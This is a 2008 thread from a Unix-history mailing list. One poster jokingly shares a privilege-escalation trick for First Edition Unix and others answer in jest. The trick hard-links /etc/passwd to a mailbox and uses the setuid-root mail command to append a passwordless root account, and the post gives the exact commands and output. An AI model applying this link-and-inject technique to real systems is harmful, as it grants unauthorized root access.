Wilko Bulte wrote:
Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 ..
  
We need to send out a security alert immediately.  This is serious.
    

CERT to the rescue!  Man the barricades ! 

;-)

  
/me barricades the doors, gets out muskets and bayonets and ready's the cannons.


  
On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
    
All work and no play...

Here's a fun hack for first edition unix.  From MAIL (I) :

   When followed by the names of a letter and one or more people, the
   letter is appended to each person's mailbox.  Each letter is
   preceded by the sender's name and a postmark.

   A person is either the nameof an entry in the directory /usr, in
   which case the mail is sent to /usr/person/mailbox, or the path
   of a directory, in which case mailbox in that directory is used.

Mail is setuid root:

# ls -l /bin/mail
  80 surwr-  1 root   3940 Jan  1 00:00:00 mail

login as a non-root user (ie "bin"), create a file "letter" with the 
contents "hack::0:/:".  Run:

    @ ln /etc/passwd /tmp/mailbox
    @ mail letter /tmp

log out and log back in as "hack".  You are now root.  Cat /etc/passwd
and notice:

   From bin Jan  1 00:49:22
   hack::0:/:

clean up the file a little and enjoy your new elevated status.

Tim Newsham
http://www.thenewsh.com/~newsham/
_______________________________________________
TUHS mailing list
TUHS@minnie.tuhs.org
https://minnie.tuhs.org/mailman/listinfo/tuhs
      
-- 
---
Larry McVoy                lm at bitmover.com           http://www.bitkeeper.com
_______________________________________________
TUHS mailing list
TUHS@minnie.tuhs.org
https://minnie.tuhs.org/mailman/listinfo/tuhs
    
--- end of quoted text ---